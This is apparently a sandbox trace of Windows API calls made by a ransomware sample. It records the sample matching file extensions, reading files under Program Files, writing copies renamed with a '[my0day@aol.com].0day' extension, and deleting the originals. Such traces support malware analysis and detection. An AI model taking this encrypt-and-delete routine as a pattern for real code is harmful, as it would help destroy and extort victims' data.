lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0047.864] lstrlenW (lpString=".docx") returned 5 [0047.864] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0047.864] lstrlenW (lpString=".pdf") returned 4 [0047.864] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0047.864] lstrlenW (lpString=".xls") returned 4 [0047.864] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0047.864] lstrlenW (lpString=".xlsx") returned 5 [0047.864] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0047.864] lstrlenW (lpString=".ppt") returned 4 [0047.864] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0047.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.864] lstrlenW (lpString=".zip") returned 4 [0047.864] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0047.864] lstrlenW (lpString=".rar") returned 4 [0047.864] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0047.864] lstrlenW (lpString=".bz2") returned 4 [0047.864] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0047.864] lstrlenW (lpString=".7z") returned 3 [0047.864] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0047.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.864] lstrlenW (lpString=".dbf") returned 4 [0047.864] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0047.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.864] lstrlenW (lpString=".1cd") returned 4 [0047.864] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0047.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70 [0047.864] lstrlenW (lpString=".jpg") returned 4 [0047.864] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0047.865] lstrcmpiW (lpString1=".CHM", lpString2=".0day") returned 1 [0047.865] lstrlenW (lpString="VBOB6.CHM") returned 9 [0047.865] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.865] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=123956) returned 1 [0047.865] CloseHandle (hObject=0x210) returned 1 [0047.865] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 0x20 [0047.865] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.865] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.865] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.865] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.865] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.866] GetLastError () returned 0x0 [0047.866] ReadFile (in: hFile=0x210, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x1e434, lpOverlapped=0x0) returned 1 [0047.869] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x1e440, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1e440, lpOverlapped=0x0) returned 1 [0047.872] ReadFile (in: hFile=0x210, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.872] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0047.872] SetEndOfFile (hFile=0x1a8) returned 1 [0047.872] CloseHandle (hObject=0x1a8) returned 1 [0047.875] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.875] SetEndOfFile (hFile=0x210) returned 1 [0047.876] CloseHandle (hObject=0x210) returned 1 [0047.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.877] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 1 [0047.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.877] lstrlenW (lpString=".doc") returned 4 [0047.877] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0047.877] lstrlenW (lpString=".docx") returned 5 [0047.877] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0047.877] lstrlenW (lpString=".pdf") returned 4 [0047.877] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0047.877] lstrlenW (lpString=".xls") returned 4 [0047.877] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0047.877] lstrlenW (lpString=".xlsx") returned 5 [0047.877] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0047.877] lstrlenW (lpString=".ppt") returned 4 [0047.877] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0047.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.877] lstrlenW (lpString=".zip") returned 4 [0047.877] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0047.877] lstrlenW (lpString=".rar") returned 4 [0047.877] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0047.877] lstrlenW (lpString=".bz2") returned 4 [0047.877] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0047.877] lstrlenW (lpString=".7z") returned 3 [0047.877] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0047.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.877] lstrlenW (lpString=".dbf") returned 4 [0047.877] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0047.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.878] lstrlenW (lpString=".1cd") returned 4 [0047.878] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0047.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.878] lstrlenW (lpString=".jpg") returned 4 [0047.878] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0047.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.878] lstrlenW (lpString=".doc") returned 4 [0047.878] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0047.878] lstrlenW (lpString=".docx") returned 5 [0047.878] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0047.878] lstrlenW (lpString=".pdf") returned 4 [0047.878] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0047.878] lstrlenW (lpString=".xls") returned 4 [0047.878] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0047.878] lstrlenW (lpString=".xlsx") returned 5 [0047.878] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0047.878] lstrlenW (lpString=".ppt") returned 4 [0047.878] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0047.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.878] lstrlenW (lpString=".zip") returned 4 [0047.878] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0047.878] lstrlenW (lpString=".rar") returned 4 [0047.878] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0047.878] lstrlenW (lpString=".bz2") returned 4 [0047.878] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0047.878] lstrlenW (lpString=".7z") returned 3 [0047.878] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0047.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.878] lstrlenW (lpString=".dbf") returned 4 [0047.878] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0047.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.878] lstrlenW (lpString=".1cd") returned 4 [0047.879] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0047.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0047.879] lstrlenW (lpString=".jpg") returned 4 [0047.879] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0047.879] lstrcmpiW (lpString1=".CHM", lpString2=".0day") returned 1 [0047.879] lstrlenW (lpString="VBUI6.CHM") returned 9 [0047.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0048.574] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=416918) returned 1 [0048.574] CloseHandle (hObject=0x1fc) returned 1 [0048.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 0x20 [0048.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0048.574] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.574] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0048.575] GetLastError () returned 0x0 [0048.575] ReadFile (in: hFile=0x1fc, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x65c96, lpOverlapped=0x0) returned 1 [0048.584] WriteFile (in: hFile=0x224, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x65ca0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x65ca0, lpOverlapped=0x0) returned 1 [0048.593] ReadFile (in: hFile=0x1fc, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.593] WriteFile (in: hFile=0x224, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0048.593] SetEndOfFile (hFile=0x224) returned 1 [0048.593] CloseHandle (hObject=0x224) returned 1 [0048.593] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.594] SetEndOfFile (hFile=0x1fc) returned 1 [0048.597] CloseHandle (hObject=0x1fc) returned 1 [0048.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0048.597] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 1 [0048.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.597] lstrlenW (lpString=".doc") returned 4 [0048.597] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0048.597] lstrlenW (lpString=".docx") returned 5 [0048.597] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0048.597] lstrlenW (lpString=".pdf") returned 4 [0048.597] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0048.597] lstrlenW (lpString=".xls") returned 4 [0048.597] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0048.597] lstrlenW (lpString=".xlsx") returned 5 [0048.597] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0048.597] lstrlenW (lpString=".ppt") returned 4 [0048.597] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0048.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.597] lstrlenW (lpString=".zip") returned 4 [0048.598] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0048.598] lstrlenW (lpString=".rar") returned 4 [0048.598] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0048.598] lstrlenW (lpString=".bz2") returned 4 [0048.598] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0048.598] lstrlenW (lpString=".7z") returned 3 [0048.598] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0048.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.598] lstrlenW (lpString=".dbf") returned 4 [0048.598] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0048.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.598] lstrlenW (lpString=".1cd") returned 4 [0048.598] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0048.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.598] lstrlenW (lpString=".jpg") returned 4 [0048.598] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0048.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.598] lstrlenW (lpString=".doc") returned 4 [0048.598] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0048.598] lstrlenW (lpString=".docx") returned 5 [0048.598] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0048.598] lstrlenW (lpString=".pdf") returned 4 [0048.598] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0048.598] lstrlenW (lpString=".xls") returned 4 [0048.598] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0048.598] lstrlenW (lpString=".xlsx") returned 5 [0048.598] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0048.598] lstrlenW (lpString=".ppt") returned 4 [0048.598] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0048.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.598] lstrlenW (lpString=".zip") returned 4 [0048.598] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0048.598] lstrlenW (lpString=".rar") returned 4 [0048.598] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0048.598] lstrlenW (lpString=".bz2") returned 4 [0048.599] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0048.599] lstrlenW (lpString=".7z") returned 3 [0048.599] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0048.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.599] lstrlenW (lpString=".dbf") returned 4 [0048.599] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0048.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.599] lstrlenW (lpString=".1cd") returned 4 [0048.599] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0048.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0048.599] lstrlenW (lpString=".jpg") returned 4 [0048.599] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0048.599] lstrcmpiW (lpString1=".png", lpString2=".0day") returned 1 [0048.599] lstrlenW (lpString="16_9-frame-image-mask.png") returned 25 [0048.599] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.813] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1551) returned 1 [0048.813] CloseHandle (hObject=0x210) returned 1 [0048.813] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png")) returned 0x20 [0048.813] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.813] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0048.813] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.813] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.813] lstrlenW (lpString=".doc") returned 4 [0048.813] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.813] lstrlenW (lpString=".docx") returned 5 [0048.813] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1 [0048.813] lstrlenW (lpString=".pdf") returned 4 [0048.813] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.813] lstrlenW (lpString=".xls") returned 4 [0048.813] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.813] lstrlenW (lpString=".xlsx") returned 5 [0048.813] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1 [0048.813] lstrlenW (lpString=".ppt") returned 4 [0048.813] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.813] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.814] lstrlenW (lpString=".zip") returned 4 [0048.814] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.814] lstrlenW (lpString=".rar") returned 4 [0048.814] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.814] lstrlenW (lpString=".bz2") returned 4 [0048.814] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.814] lstrlenW (lpString=".7z") returned 3 [0048.814] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.814] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.814] lstrlenW (lpString=".dbf") returned 4 [0048.814] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0048.814] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.814] lstrlenW (lpString=".1cd") returned 4 [0048.814] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0048.814] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.814] lstrlenW (lpString=".jpg") returned 4 [0048.814] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.814] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.814] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.814] lstrlenW (lpString=".doc") returned 4 [0048.814] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0048.814] lstrlenW (lpString=".docx") returned 5 [0048.814] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1 [0048.814] lstrlenW (lpString=".pdf") returned 4 [0048.814] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0048.814] lstrlenW (lpString=".xls") returned 4 [0048.814] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0048.814] lstrlenW (lpString=".xlsx") returned 5 [0048.814] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1 [0048.814] lstrlenW (lpString=".ppt") returned 4 [0048.814] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0048.814] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.814] lstrlenW (lpString=".zip") returned 4 [0048.814] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0048.815] lstrlenW (lpString=".rar") returned 4 [0048.815] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0048.815] lstrlenW (lpString=".bz2") returned 4 [0048.815] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0048.815] lstrlenW (lpString=".7z") returned 3 [0048.815] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0048.815] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.815] lstrlenW (lpString=".dbf") returned 4 [0048.815] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0048.815] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.815] lstrlenW (lpString=".1cd") returned 4 [0048.815] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0048.815] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-image-mask.png") returned 78 [0048.815] lstrlenW (lpString=".jpg") returned 4 [0048.815] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0048.815] lstrcmpiW (lpString1=".wmv", lpString2=".0day") returned 1 [0048.815] lstrlenW (lpString="flower_trans_RGB_PAL.wmv") returned 24 [0048.815] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0048.815] GetFileSizeEx (in: hFile=0x210, 